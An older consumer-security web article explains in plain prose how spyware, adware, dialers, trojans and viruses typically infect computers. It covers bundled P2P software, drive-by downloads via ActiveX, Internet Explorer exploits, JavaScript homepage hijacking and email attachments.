Subscribe to Malware Help RSS Feed RSS Feed - Subscribe to Malware Help. Org on Twitter Follow on Twitter - Malware Help YouTube Channel YouTube Channel - Subscribe to Malware Help by Email Subscribe by Email

Methods of Infection

by Shanmuga| Tweet This | Google +1 | Facebook | Stumble It | Reddit | Digg | del.icio.us

P2P wrecks havoc

All most all of the spyware and adware come bundled with popular free programs and also by most of the peer to peer networks like Kazaa, Bearshare, Grockster, LimeWire, Morpheus among others. They install malware on your computer as part of the P2P installation process. Applications such as Cydoor, New.net, TopText, SaveNow, Webhancer, VX2, CommonName, GetNet/ClearSearch, IncrediFind and OnFlow are a few of the applications that are installed this way and may serve up ad banners and ad messages, or track your Internet surfing habits. Unfortunately, the makers of the host programs try not to advertise their programs' hidden payloads. Reading the licensing agreement (carefully) during installation will often reveal embedded licenses for the piggybacking adware.

Spyware for FREE, any takers?

Sometimes you install an application that claims to be free but at the same time will also install a secondary program. This secondary program will then monitor your surfing habits and report them back to a central database. However, when the user selects the remove the installed application, a component of the program remains behind. The next time the user connects to the Internet; this component re-downloads the remainder of program and reinstalls it.

MOI sec warn Methods of Infection

What are Drive-by-Downloads?

Another scenario is you visit a website that pops up a window with a message like in order to properly view this website you must install this program. The FTP / HTTP Get request will initiate the download of the software onto the client machine. Installation will be performed by the user and during this installation they will be asked permission to install the malware as well as the software. Malware may also be installed through accessing a website, whose prime aim is to drop Spyware onto the client. The malware installation will be embedded within the web page. ActiveX (a Microsoft technology) is then utilized to install the malware (generally as a browser plug-in), on the client. ActiveX is a mechanism which allows applications to be run within other applications. This installation will allow the malware to operate every time the browser is opened.

ActiveX is Microsoft's answer to the Java technology created by Sun Microsystems and is roughly equivalent to a Java applet. The main thing that you create when writing a program to run in the ActiveX environment is a component, a self-sufficient program that can be run anywhere on your web page. This component, or ActiveX control, could be anything from a scrolling marquis to an animation that is seen on the web page. It could also be an area where the visitor enters information about himself or his credit card. ActiveX is useful in marketing because it can be used to make web pages much more interesting as well as efficient and effective. http://www.upstreamcio.com/glossary.asp

Another common method of malware intruding an unprotected system is when visiting a site in Internet Explorer that displays an advertisement or misleading download link that you have to click on to continue. That's when the site installs one or more programs on your computer, without asking any further permission. Sometimes these are referred to as 'Drive-by Downloads'.

The Vulnerability route

Another method of "infection" is through exploiting security holes in Internet Explorer. Even if a user doesn't click on something on web page, a malicious site can deliver its payload of malware. CoolWebSearch, one of the most notorious pests in recent times is suspected to be installed by pop-ups exploiting security holes in IE. Merijn Bellekom has fully documented the metamorphosis of CoolWebSearch in his Coolwebsearch chronicles.

Covert Action

Yet another method uses javascript, a web page opens another page running a javascript. When the surfer closes one web page, the javascript page covertly resets the homepage. The script is written in such a way that any time the surfer attempts to reset the homepage, the program automatically resets it again.

A scripting language developed by Netscape to enable Web authors to design interactive sites. Although it shares many of the features and structures of the full Java language, it was developed independently. Javascript can interact with HTML source code, enabling Web authors to spice up their sites with dynamic content. JavaScript is endorsed by a number of software companies and is an open language that anyone can use without purchasing a license. It is supported by recent browsers from Netscape and Microsoft, though Internet Explorer supports only a subset, which Microsoft calls Jscript. http://opal.msu.montana.edu/webteam/docs/glossary.html

Many dialer programs use hidden windows, when the user opens the web browser after installation of a carrier software package, which masquerades as a useful program like free games or a screensaver, the dialer application opens in a new hidden window, turns off the sound of the users computer and calls a phone number without the users permission.

On the other hand Trojans can be spread in the guise of literally ANYTHING people find desirable, such as a free game, movie, song, etc. Victims typically download a Trojan from the web archive, got it via peer-to-peer file exchange using IRC/instant messaging/Kazaa etc., or just carelessly opened some email attachment. Trojans usually do their damage silently. The first sign of trouble is often when others tell you that you are attacking them or trying to infect them!

MOI MSemailspoof Methods of Infection

Viruses enter your system via e-mail, downloads, infected floppy disks, or (occasionally) hacking. You get a virus when you copy infected files to your computer, then activate the code inside by running the infected application or opening an infected document.



{ 0 comments… add one now }

Leave a Comment